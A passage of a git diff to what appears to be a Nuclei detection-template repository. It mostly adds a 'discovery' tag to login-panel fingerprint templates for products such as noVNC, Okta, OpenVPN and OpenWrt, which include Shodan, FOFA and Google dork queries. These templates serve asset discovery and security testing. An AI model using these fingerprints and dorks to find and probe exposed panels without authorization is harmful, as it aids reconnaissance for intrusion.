"{{BaseURL}}/home/login" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_all(to_lower(body), "<title>ngsurvey enterprise survey software", "ngsconfig.js")' +id: ngsurvey-panel + +info: + name: ngSurvey Login Panel - Detect + author: righettod + severity: info + description: | + ngSurvey products was detected. + reference: + - https://www.ngsurvey.com/ + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"ngSurvey enterprise survey software" + tags: panel,ngsurvey,login,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/home/login" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(to_lower(body), "ngsurvey enterprise survey software", "ngsconfig.js")' condition: and # digest: 4a0a0047304502200c04886b44e1a56a1629d46ec9c406a2d4afe4d2f2f08e597b7a87a4023cd9c1022100b0f776c217ba7c9908cd993d1830511e071aed270233ab14d208e9c53dd77fee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml index a8b6c6e4ab6..d4f855fb69c 100644 --- a/http/exposed-panels/nocodb-panel.yaml +++ b/http/exposed-panels/nocodb-panel.yaml @@ -17,7 +17,7 @@ info: vendor: xgenecloud product: nocodb shodan-query: "http.favicon.hash:206985584" - tags: panel,nocodb,login,detect + tags: panel,nocodb,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/noescape-login.yaml b/http/exposed-panels/noescape-login.yaml index 28dc5ae2b83..eb0df197258 100644 --- a/http/exposed-panels/noescape-login.yaml +++ b/http/exposed-panels/noescape-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"NoEscape - Login" - tags: panel,noescape + tags: panel,noescape,discovery http: - method: GET diff --git a/http/exposed-panels/nordex-wind-farm-portal.yaml b/http/exposed-panels/nordex-wind-farm-portal.yaml index 0a6db6d575e..7b888aa86f0 100644 --- a/http/exposed-panels/nordex-wind-farm-portal.yaml +++ b/http/exposed-panels/nordex-wind-farm-portal.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: http.html:"Nordex Control" - tags: panel,nordex,iot + tags: panel,nordex,iot,discovery http: - method: GET diff --git a/http/exposed-panels/normhost-backup-server-manager.yaml b/http/exposed-panels/normhost-backup-server-manager.yaml index 97aea93a33b..92bf60862cb 100644 --- a/http/exposed-panels/normhost-backup-server-manager.yaml +++ b/http/exposed-panels/normhost-backup-server-manager.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Normhost Backup server manager" - tags: panel,normhost + tags: panel,normhost,discovery http: - method: GET diff --git a/http/exposed-panels/novnc-login-panel.yaml b/http/exposed-panels/novnc-login-panel.yaml index fd219f53c2b..8c4a7a8c971 100644 --- a/http/exposed-panels/novnc-login-panel.yaml +++ b/http/exposed-panels/novnc-login-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"noVNC" product: novnc vendor: novnc - tags: panel,novnc + tags: panel,novnc,discovery http: - method: GET diff --git a/http/exposed-panels/nozomi-panel.yaml b/http/exposed-panels/nozomi-panel.yaml index 87a0650f11f..79bddd9e231 100644 --- a/http/exposed-panels/nozomi-panel.yaml +++ b/http/exposed-panels/nozomi-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Please Login | Nozomi Networks Console" - tags: panel,nozomi + tags: panel,nozomi,discovery http: - method: GET diff --git a/http/exposed-panels/np-data-cache.yaml b/http/exposed-panels/np-data-cache.yaml index e36dacef1ee..8f23dd4facd 100644 --- a/http/exposed-panels/np-data-cache.yaml +++ b/http/exposed-panels/np-data-cache.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"NP Data Cache" - tags: np,panel,cache + tags: np,panel,cache,discovery http: - method: GET diff --git a/http/exposed-panels/nport-web-console.yaml b/http/exposed-panels/nport-web-console.yaml index 47d53d89c45..488ec120fd5 100644 --- a/http/exposed-panels/nport-web-console.yaml +++ b/http/exposed-panels/nport-web-console.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"NPort Web Console" product: nport_6450-t_firmware vendor: moxa - tags: panel,nport + tags: panel,nport,discovery http: - method: GET diff --git a/http/exposed-panels/nsq-admin-panel.yaml b/http/exposed-panels/nsq-admin-panel.yaml index 8ead65a6159..4167c1f8e9d 100644 --- a/http/exposed-panels/nsq-admin-panel.yaml +++ b/http/exposed-panels/nsq-admin-panel.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: title:"nsqadmin" - tags: nsq,admin,panel,exposure + tags: nsq,admin,panel,exposure,discovery http: - method: GET diff --git a/http/exposed-panels/nutanix-web-console-login.yaml b/http/exposed-panels/nutanix-web-console-login.yaml index b4488befea9..21c919a7a0d 100644 --- a/http/exposed-panels/nutanix-web-console-login.yaml +++ b/http/exposed-panels/nutanix-web-console-login.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,nutanix,login + tags: panel,nutanix,login,discovery http: - method: GET diff --git a/http/exposed-panels/nuxeo-platform-panel.yaml b/http/exposed-panels/nuxeo-platform-panel.yaml index 6d3c14e3614..a2a8932f660 100644 --- a/http/exposed-panels/nuxeo-platform-panel.yaml +++ b/http/exposed-panels/nuxeo-platform-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: title:"Nuxeo Platform" product: nuxeo vendor: nuxeo - tags: panel,nuxeo + tags: panel,nuxeo,discovery http: - method: GET diff --git a/http/exposed-panels/nzbget-panel.yaml b/http/exposed-panels/nzbget-panel.yaml index bf9cd8da2da..6408328790c 100644 --- a/http/exposed-panels/nzbget-panel.yaml +++ b/http/exposed-panels/nzbget-panel.yaml @@ -18,7 +18,7 @@ info: - html:"NZBGet" - http.html:"nzbget" fofa-query: body="nzbget" - tags: panel,nzbget + tags: panel,nzbget,discovery http: - method: GET diff --git a/http/exposed-panels/o2-easy-panel.yaml b/http/exposed-panels/o2-easy-panel.yaml index f825dfc0475..c8bc0b4471b 100644 --- a/http/exposed-panels/o2-easy-panel.yaml +++ b/http/exposed-panels/o2-easy-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"O2 Easy Setup" - tags: panel,o2,easy,iot,router + tags: panel,o2,easy,iot,router,discovery http: - method: GET diff --git a/http/exposed-panels/ocomon-panel.yaml b/http/exposed-panels/ocomon-panel.yaml index 1f2dab742fc..9494dab3bf6 100644 --- a/http/exposed-panels/ocomon-panel.yaml +++ b/http/exposed-panels/ocomon-panel.yaml @@ -20,7 +20,7 @@ info: - http.html:"OcoMon" - http.html:"ocomon" fofa-query: body="ocomon" - tags: panel,ocomon,oss,ocomon_project + tags: panel,ocomon,oss,ocomon_project,discovery http: - method: GET diff --git a/http/exposed-panels/ocs-inventory-login.yaml b/http/exposed-panels/ocs-inventory-login.yaml index 977d298ab3f..55612dcd444 100644 --- a/http/exposed-panels/ocs-inventory-login.yaml +++ b/http/exposed-panels/ocs-inventory-login.yaml @@ -16,7 +16,7 @@ info: fofa-query: title="OCS Inventory" product: ocs_inventory vendor: factorfx - tags: ocs-inventory,panel + tags: ocs-inventory,panel,discovery http: - method: GET diff --git a/http/exposed-panels/octoprint-login.yaml b/http/exposed-panels/octoprint-login.yaml index bc6235e5174..8fd1c7200af 100644 --- a/http/exposed-panels/octoprint-login.yaml +++ b/http/exposed-panels/octoprint-login.yaml @@ -13,7 +13,7 @@ info: max-request: 2 vendor: octoprint product: octoprint - tags: octoprint,panel + tags: octoprint,panel,discovery http: - method: GET diff --git a/http/exposed-panels/odoo-database-manager.yaml b/http/exposed-panels/odoo-database-manager.yaml index c573e4ade3f..a7c2c828e12 100644 --- a/http/exposed-panels/odoo-database-manager.yaml +++ b/http/exposed-panels/odoo-database-manager.yaml @@ -18,7 +18,7 @@ info: - cpe:"cpe:2.3:a:odoo:odoo" fofa-query: title="odoo" google-query: intitle:"odoo" - tags: panel,odoo,backup + tags: panel,odoo,backup,discovery http: - method: GET diff --git a/http/exposed-panels/odoo-panel.yaml b/http/exposed-panels/odoo-panel.yaml index d2b238e0c85..3b76adf59cc 100644 --- a/http/exposed-panels/odoo-panel.yaml +++ b/http/exposed-panels/odoo-panel.yaml @@ -17,7 +17,7 @@ info: - cpe:"cpe:2.3:a:odoo:odoo" fofa-query: title="odoo" google-query: intitle:"odoo" - tags: login,panel,odoo + tags: login,panel,odoo,discovery http: - method: GET diff --git a/http/exposed-panels/office-webapps-panel.yaml b/http/exposed-panels/office-webapps-panel.yaml index 473fd4dd7d0..08842a80d25 100644 --- a/http/exposed-panels/office-webapps-panel.yaml +++ b/http/exposed-panels/office-webapps-panel.yaml @@ -20,7 +20,7 @@ info: - html:"Provide a link that opens Word" - http.html:"provide a link that opens word" fofa-query: body="provide a link that opens word" - tags: panel,office-webapps,login,microsoft + tags: panel,office-webapps,login,microsoft,discovery http: - method: GET diff --git a/http/exposed-panels/officekeeper-admin-login.yaml b/http/exposed-panels/officekeeper-admin-login.yaml index f8734b02b07..608edf00100 100644 --- a/http/exposed-panels/officekeeper-admin-login.yaml +++ b/http/exposed-panels/officekeeper-admin-login.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: http.favicon.hash:-800060828 - tags: officekeeper,dlp,panel + tags: officekeeper,dlp,panel,discovery http: - method: GET diff --git a/http/exposed-panels/oipm-detect.yaml b/http/exposed-panels/oipm-detect.yaml index aebf03e4530..d8acbaa6911 100644 --- a/http/exposed-panels/oipm-detect.yaml +++ b/http/exposed-panels/oipm-detect.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: oneidentity product: password_manager - tags: panel,oneidentity + tags: panel,oneidentity,discovery http: - method: GET diff --git a/http/exposed-panels/oki-data.yaml b/http/exposed-panels/oki-data.yaml index a5d42701687..efd2012333b 100644 --- a/http/exposed-panels/oki-data.yaml +++ b/http/exposed-panels/oki-data.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,oki,edb + tags: panel,oki,edb,discovery http: - method: GET diff --git a/http/exposed-panels/okiko-sfiler-portal.yaml b/http/exposed-panels/okiko-sfiler-portal.yaml index 080120f9900..3653b437b1b 100644 --- a/http/exposed-panels/okiko-sfiler-portal.yaml +++ b/http/exposed-panels/okiko-sfiler-portal.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"S-Filer" - tags: okiko,panel + tags: okiko,panel,discovery http: - method: GET diff --git a/http/exposed-panels/okta-panel.yaml b/http/exposed-panels/okta-panel.yaml index 12fa43938c1..87c49e6cb2d 100644 --- a/http/exposed-panels/okta-panel.yaml +++ b/http/exposed-panels/okta-panel.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"okta" - tags: panel,okta,login + tags: panel,okta,login,discovery http: - method: GET diff --git a/http/exposed-panels/ollama-llm-panel.yaml b/http/exposed-panels/ollama-llm-panel.yaml index 0b3e845a923..e7371a2ccb7 100644 --- a/http/exposed-panels/ollama-llm-panel.yaml +++ b/http/exposed-panels/ollama-llm-panel.yaml @@ -16,7 +16,7 @@ info: zoomeye-query: app="Ollama" product: ollama vendor: ollama - tags: panel,ollama,llm,detect + tags: panel,ollama,llm,detect,discovery http: - method: GET diff --git a/http/exposed-panels/olt-web-interface.yaml b/http/exposed-panels/olt-web-interface.yaml index 973fbe3196c..7028162e646 100644 --- a/http/exposed-panels/olt-web-interface.yaml +++ b/http/exposed-panels/olt-web-interface.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: title:"OLT Web Management Interface" - tags: edb,panel,olt + tags: edb,panel,olt,discovery http: - method: GET diff --git a/http/exposed-panels/olympic-panel.yaml b/http/exposed-panels/olympic-panel.yaml index 8c66d4954ad..eca918a5b48 100644 --- a/http/exposed-panels/olympic-panel.yaml +++ b/http/exposed-panels/olympic-panel.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 shodan-query: http.title:"olympic banking system" - tags: panel,olympic,login + tags: panel,olympic,login,discovery http: - method: GET diff --git a/http/exposed-panels/omniampx-panel.yaml b/http/exposed-panels/omniampx-panel.yaml index cb88f6a1f4f..66f6eaebb87 100644 --- a/http/exposed-panels/omniampx-panel.yaml +++ b/http/exposed-panels/omniampx-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.html:"Omnia MPX" product: omnia_mpx_node vendor: telosalliance - tags: panel,omnia,omniampx + tags: panel,omnia,omniampx,discovery http: - method: GET diff --git a/http/exposed-panels/onedev-panel.yaml b/http/exposed-panels/onedev-panel.yaml index 99d4d4ee0a7..928a85825c2 100644 --- a/http/exposed-panels/onedev-panel.yaml +++ b/http/exposed-panels/onedev-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"OneDev" - tags: tech,detect,onedev + tags: tech,detect,onedev,discovery http: - method: GET diff --git a/http/exposed-panels/onlyoffice-login-panel.yaml b/http/exposed-panels/onlyoffice-login-panel.yaml index 77b6ff089f0..3f089bc92c9 100644 --- a/http/exposed-panels/onlyoffice-login-panel.yaml +++ b/http/exposed-panels/onlyoffice-login-panel.yaml @@ -16,7 +16,7 @@ info: fofa-query: - app="ONLYOFFICE" && (icon_hash="1928933157" || icon_hash="826083956" || icon_hash="-1380930248" || icon_hash="-285544629" || icon_hash="812741391") - app="onlyoffice" && (icon_hash="1928933157" || icon_hash="826083956" || icon_hash="-1380930248" || icon_hash="-285544629" || icon_hash="812741391") - tags: panel,onlyoffice,detect + tags: panel,onlyoffice,detect,discovery http: - method: GET diff --git a/http/exposed-panels/open-game-panel.yaml b/http/exposed-panels/open-game-panel.yaml index 77c6273ae2b..bf086772843 100644 --- a/http/exposed-panels/open-game-panel.yaml +++ b/http/exposed-panels/open-game-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Open Game Panel" - tags: panel,edb + tags: panel,edb,discovery http: - method: GET diff --git a/http/exposed-panels/open-stack-dashboard-login.yaml b/http/exposed-panels/open-stack-dashboard-login.yaml index 81f2e3b432a..df1e050769f 100644 --- a/http/exposed-panels/open-stack-dashboard-login.yaml +++ b/http/exposed-panels/open-stack-dashboard-login.yaml @@ -15,7 +15,7 @@ info: max-request: 2 vendor: openstack product: horizon - tags: panel,openstack,edb + tags: panel,openstack,edb,discovery http: - method: GET diff --git a/http/exposed-panels/open-virtualization-manager-panel.yaml b/http/exposed-panels/open-virtualization-manager-panel.yaml index 7975e9b0dec..11b2237d6e0 100644 --- a/http/exposed-panels/open-virtualization-manager-panel.yaml +++ b/http/exposed-panels/open-virtualization-manager-panel.yaml @@ -15,7 +15,7 @@ info: max-request: 2 shodan-query: title:"Ovirt-Engine" google-query: intitle:"Ovirt-Engine" - tags: panel,ovirt,oss + tags: panel,ovirt,oss,discovery http: - method: GET diff --git a/http/exposed-panels/open-web-analytics-panel.yaml b/http/exposed-panels/open-web-analytics-panel.yaml index bed7c11c5e8..16c1a2b4a12 100644 --- a/http/exposed-panels/open-web-analytics-panel.yaml +++ b/http/exposed-panels/open-web-analytics-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"OWA CONFIG SETTINGS" - tags: open-web-analytics,login,panel + tags: open-web-analytics,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/openam-panel.yaml b/http/exposed-panels/openam-panel.yaml index 1560529af2c..cecd52e381f 100644 --- a/http/exposed-panels/openam-panel.yaml +++ b/http/exposed-panels/openam-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"openam" fofa-query: title="openam" google-query: intitle:"openam" - tags: panel,openam,opensso,login,forgerock + tags: panel,openam,opensso,login,forgerock,discovery http: - method: GET diff --git a/http/exposed-panels/openbmcs-detect.yaml b/http/exposed-panels/openbmcs-detect.yaml index c337a8eca5e..073e2633277 100644 --- a/http/exposed-panels/openbmcs-detect.yaml +++ b/http/exposed-panels/openbmcs-detect.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,openbmcs,detect + tags: panel,openbmcs,detect,discovery http: - method: GET diff --git a/http/exposed-panels/openbullet2-panel.yaml b/http/exposed-panels/openbullet2-panel.yaml index 3892d180443..29a4c4b7840 100644 --- a/http/exposed-panels/openbullet2-panel.yaml +++ b/http/exposed-panels/openbullet2-panel.yaml @@ -12,7 +12,7 @@ info: verified: "true" max-request: 1 shodan-query: http.favicon.hash:-1264095219 - tags: openbullet,panel,login + tags: openbullet,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/opencart-panel.yaml b/http/exposed-panels/opencart-panel.yaml index 521e4d8ab5c..eaa6fe7d3cc 100644 --- a/http/exposed-panels/opencart-panel.yaml +++ b/http/exposed-panels/opencart-panel.yaml @@ -22,7 +22,7 @@ info: - http.html:"opencart" - cpe:"cpe:2.3:a:opencart:opencart" fofa-query: body="opencart" - tags: panel,opencart + tags: panel,opencart,discovery http: - method: GET diff --git a/http/exposed-panels/opencast-detect.yaml b/http/exposed-panels/opencast-detect.yaml index a7e33eedcd0..d415a2ea32c 100644 --- a/http/exposed-panels/opencast-detect.yaml +++ b/http/exposed-panels/opencast-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/opencast/opencast metadata: max-request: 1 - tags: panel,opencast + tags: panel,opencast,discovery http: - method: GET diff --git a/http/exposed-panels/opencats-panel.yaml b/http/exposed-panels/opencats-panel.yaml index 23866934d8d..2ae367fd69e 100644 --- a/http/exposed-panels/opencats-panel.yaml +++ b/http/exposed-panels/opencats-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"opencats" fofa-query: title="opencats" google-query: intitle:"opencats" - tags: panel,opencats + tags: panel,opencats,discovery http: - method: GET diff --git a/http/exposed-panels/opencpu-panel.yaml b/http/exposed-panels/opencpu-panel.yaml index c50bab9fe1c..163b161cf5c 100644 --- a/http/exposed-panels/opencpu-panel.yaml +++ b/http/exposed-panels/opencpu-panel.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,opencpu,oss + tags: panel,opencpu,oss,discovery http: - method: GET diff --git a/http/exposed-panels/openedge-panel.yaml b/http/exposed-panels/openedge-panel.yaml index 3acc9595d8d..0e78fd2aa3a 100644 --- a/http/exposed-panels/openedge-panel.yaml +++ b/http/exposed-panels/openedge-panel.yaml @@ -14,7 +14,7 @@ info: vendor: progress product: openedge shodan-query: html:"Welcome to Progress Application Server for OpenEdge" - tags: panel,openedge,login,detect + tags: panel,openedge,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/openemr-detect.yaml b/http/exposed-panels/openemr-detect.yaml index 11b2dec974f..251a51328f5 100644 --- a/http/exposed-panels/openemr-detect.yaml +++ b/http/exposed-panels/openemr-detect.yaml @@ -25,7 +25,7 @@ info: - app="openemr" - icon_hash=1971268439 google-query: intitle:"openemr" - tags: panel,openemr,open-emr + tags: panel,openemr,open-emr,discovery http: - method: GET diff --git a/http/exposed-panels/openerp-database.yaml b/http/exposed-panels/openerp-database.yaml index e0b66b8991c..a6cd1f6fcfd 100644 --- a/http/exposed-panels/openerp-database.yaml +++ b/http/exposed-panels/openerp-database.yaml @@ -18,7 +18,7 @@ info: - cpe:"cpe:2.3:a:odoo:odoo" fofa-query: title="odoo" google-query: intitle:"odoo" - tags: openerp,panel,odoo + tags: openerp,panel,odoo,discovery http: - method: GET diff --git a/http/exposed-panels/openfire-admin-panel.yaml b/http/exposed-panels/openfire-admin-panel.yaml index 4b05f16d7f2..c8df2ea6e5a 100644 --- a/http/exposed-panels/openfire-admin-panel.yaml +++ b/http/exposed-panels/openfire-admin-panel.yaml @@ -24,7 +24,7 @@ info: google-query: - intitle:"openfire admin console" - intitle:"openfire" - tags: panel,openfire,admin,console,igniterealtime + tags: panel,openfire,admin,console,igniterealtime,discovery http: - method: GET diff --git a/http/exposed-panels/opengear-panel.yaml b/http/exposed-panels/opengear-panel.yaml index 6fce4bea36c..33411a50648 100644 --- a/http/exposed-panels/opengear-panel.yaml +++ b/http/exposed-panels/opengear-panel.yaml @@ -17,7 +17,7 @@ info: google-query: intitle:"Opengear Management Console" product: opengear vendor: opengear - tags: panel,opengear + tags: panel,opengear,discovery http: - method: GET diff --git a/http/exposed-panels/opennebula-panel.yaml b/http/exposed-panels/opennebula-panel.yaml index 43f1ef7e145..819957e9b98 100644 --- a/http/exposed-panels/opennebula-panel.yaml +++ b/http/exposed-panels/opennebula-panel.yaml @@ -24,7 +24,7 @@ info: - title="OpenNebula Sunstone Login" - icon_hash="-119786698" - icon_hash="656672194" - tags: panel,opennebula + tags: panel,opennebula,discovery http: - method: GET diff --git a/http/exposed-panels/opennms-web-console.yaml b/http/exposed-panels/opennms-web-console.yaml index 8a60f4d0833..fd64017b86f 100644 --- a/http/exposed-panels/opennms-web-console.yaml +++ b/http/exposed-panels/opennms-web-console.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: opennms product: opennms - tags: panel,login,edb,opennms + tags: panel,login,edb,opennms,discovery http: - method: GET diff --git a/http/exposed-panels/openobserve-panel.yaml b/http/exposed-panels/openobserve-panel.yaml index c23bd0511a2..7faedb497fb 100644 --- a/http/exposed-panels/openobserve-panel.yaml +++ b/http/exposed-panels/openobserve-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"OpenObserve" - tags: panel,openobserve,login + tags: panel,openobserve,login,discovery http: - method: GET diff --git a/http/exposed-panels/opensearch-dashboard-panel.yaml b/http/exposed-panels/opensearch-dashboard-panel.yaml index a2cfb032ba3..1d039f73c24 100644 --- a/http/exposed-panels/opensearch-dashboard-panel.yaml +++ b/http/exposed-panels/opensearch-dashboard-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: title:"OpenSearch" fofa-query: title="OpenSearch" - tags: opensearch,dashboard,login,panel,detect + tags: opensearch,dashboard,login,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/openshift-oauth-proxy-panel.yaml b/http/exposed-panels/openshift-oauth-proxy-panel.yaml index 76d7fb9a49c..a13964477af 100644 --- a/http/exposed-panels/openshift-oauth-proxy-panel.yaml +++ b/http/exposed-panels/openshift-oauth-proxy-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 fofa-query: body="Openshift" && port="9001" - tags: openshift,redhat,detect,oauth,proxy,login + tags: openshift,redhat,detect,oauth,proxy,login,discovery http: - method: GET diff --git a/http/exposed-panels/opensign-panel.yaml b/http/exposed-panels/opensign-panel.yaml index db06cf7059c..c2646741eac 100644 --- a/http/exposed-panels/opensign-panel.yaml +++ b/http/exposed-panels/opensign-panel.yaml @@ -1,31 +1,31 @@ -id: opensign-panel - -info: - name: OpenSign Login Panel - Detect - author: righettod - severity: info - description: | - OpenSign Login panel was discovered. - reference: - - https://www.opensignlabs.com/ - - https://github.com/OpenSignLabs/OpenSign - metadata: - max-request: 2 - verified: true - shodan-query: http.title:"opensign" - tags: panel,opensign,login,detect - -http: - - method: GET - path: - - "{{BaseURL}}/locales/en/translation.json" - - "{{BaseURL}}/" - - stop-at-first-match: true - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(body, "OpenSign")' +id: opensign-panel + +info: + name: OpenSign Login Panel - Detect + author: righettod + severity: info + description: | + OpenSign Login panel was discovered. + reference: + - https://www.opensignlabs.com/ + - https://github.com/OpenSignLabs/OpenSign + metadata: + max-request: 2 + verified: true + shodan-query: http.title:"opensign" + tags: panel,opensign,login,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/locales/en/translation.json" + - "{{BaseURL}}/" + + stop-at-first-match: true + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "OpenSign")' condition: and # digest: 4b0a00483046022100928f72daa0497a8956ff44e0eef054c160ef50a1b4e25bbf983d17dd18b4b945022100ddf4e343a0fffc10e85c5116df1142163ac89109dca9d4f306a8dc51f0781852:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/opensis-panel.yaml b/http/exposed-panels/opensis-panel.yaml index 52cdec6ceb7..d97d3f6c1ae 100644 --- a/http/exposed-panels/opensis-panel.yaml +++ b/http/exposed-panels/opensis-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"opensis" fofa-query: title="opensis" google-query: intitle:"opensis" - tags: panel,opensis,login,os4ed + tags: panel,opensis,login,os4ed,discovery http: - method: GET diff --git a/http/exposed-panels/opentext-contentserver-panel.yaml b/http/exposed-panels/opentext-contentserver-panel.yaml index 66165c414da..e20a82ea572 100644 --- a/http/exposed-panels/opentext-contentserver-panel.yaml +++ b/http/exposed-panels/opentext-contentserver-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: http.title:"Content Server" - tags: panel,opentext,login + tags: panel,opentext,login,discovery http: - method: GET diff --git a/http/exposed-panels/opentouch-multimediaservices-panel.yaml b/http/exposed-panels/opentouch-multimediaservices-panel.yaml index b6fcf64a527..2a6668f5762 100644 --- a/http/exposed-panels/opentouch-multimediaservices-panel.yaml +++ b/http/exposed-panels/opentouch-multimediaservices-panel.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 2 - tags: panel,opentouch,login,detect + tags: panel,opentouch,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/openvas-panel.yaml b/http/exposed-panels/openvas-panel.yaml index 1c6f3f14550..536406ce70c 100644 --- a/http/exposed-panels/openvas-panel.yaml +++ b/http/exposed-panels/openvas-panel.yaml @@ -16,7 +16,7 @@ info: vendor: openvas product: openvas_manager shodan-query: http.favicon.hash:1606029165 - tags: panel,openvas,admin,login + tags: panel,openvas,admin,login,discovery http: - method: GET diff --git a/http/exposed-panels/openvpn-admin.yaml b/http/exposed-panels/openvpn-admin.yaml index e0e4184ac3a..da5bd9b696f 100644 --- a/http/exposed-panels/openvpn-admin.yaml +++ b/http/exposed-panels/openvpn-admin.yaml @@ -23,7 +23,7 @@ info: - body="router management - server openvpn" - title="openvpn-admin" google-query: intitle:"openvpn-admin" - tags: panel,openvpn,admin,config + tags: panel,openvpn,admin,config,discovery http: - method: GET diff --git a/http/exposed-panels/openvpn-connect.yaml b/http/exposed-panels/openvpn-connect.yaml index 4dd88519b7d..a0f449698e8 100644 --- a/http/exposed-panels/openvpn-connect.yaml +++ b/http/exposed-panels/openvpn-connect.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"openvpn connect" fofa-query: title="openvpn connect" google-query: intitle:"openvpn connect" - tags: panel,openvpn,connect,vpn + tags: panel,openvpn,connect,vpn,discovery http: - method: GET diff --git a/http/exposed-panels/openvpn-monitor.yaml b/http/exposed-panels/openvpn-monitor.yaml index 729de0cba57..7f7c1e3c852 100644 --- a/http/exposed-panels/openvpn-monitor.yaml +++ b/http/exposed-panels/openvpn-monitor.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 2 - tags: openvpn,disclosure,panel + tags: openvpn,disclosure,panel,discovery http: - method: GET diff --git a/http/exposed-panels/openvpn-router-management.yaml b/http/exposed-panels/openvpn-router-management.yaml index 374426346cc..48d8cfb1daa 100644 --- a/http/exposed-panels/openvpn-router-management.yaml +++ b/http/exposed-panels/openvpn-router-management.yaml @@ -23,7 +23,7 @@ info: - body="router management - server openvpn" - title="openvpn-admin" google-query: intitle:"openvpn-admin" - tags: panel,openvpn,router + tags: panel,openvpn,router,discovery http: - method: GET diff --git a/http/exposed-panels/openvz-web-login.yaml b/http/exposed-panels/openvz-web-login.yaml index dd27002801c..e4371942583 100644 --- a/http/exposed-panels/openvz-web-login.yaml +++ b/http/exposed-panels/openvz-web-login.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1898583197 - tags: panel,openvz + tags: panel,openvz,discovery http: - method: GET diff --git a/http/exposed-panels/openwebui-panel.yaml b/http/exposed-panels/openwebui-panel.yaml index cd4156a5302..4c946600ad4 100644 --- a/http/exposed-panels/openwebui-panel.yaml +++ b/http/exposed-panels/openwebui-panel.yaml @@ -1,5 +1,5 @@ -id: openwebui-panel - +id: openwebui-panel + info: name: Openweb UI Panel - Detect author: rxerium @@ -12,23 +12,23 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-286484075 - tags: panel,openwebui,login + tags: panel,openwebui,login,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Open WebUI' - - - type: status - status: +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Open WebUI' + + - type: status + status: - 200 # digest: 4a0a00473045022100b77cd319f310cd2da5efbbe8b58f2edbdc0d000399e317403ef61e532cdf8a0c022074a06fe4bd42106ac30d89e5f6f1dfb39e111b501a6c4280299a71eb08d39389:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/openwrt-login.yaml b/http/exposed-panels/openwrt-login.yaml index 0fb30239bdf..7e91767725c 100644 --- a/http/exposed-panels/openwrt-login.yaml +++ b/http/exposed-panels/openwrt-login.yaml @@ -18,7 +18,7 @@ info: - http.title:"openwrt - luci" fofa-query: title="openwrt - luci" google-query: intitle:"openwrt - luci" - tags: openwrt,router,panel + tags: openwrt,router,panel,discovery http: - method: GET diff --git a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml index ca940c0a327..d8460afa2ed 100644 --- a/http/exposed-panels/openwrt/openwrt-luci-panel.yaml +++ b/http/exposed-panels/openwrt/openwrt-luci-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"openwrt - luci" 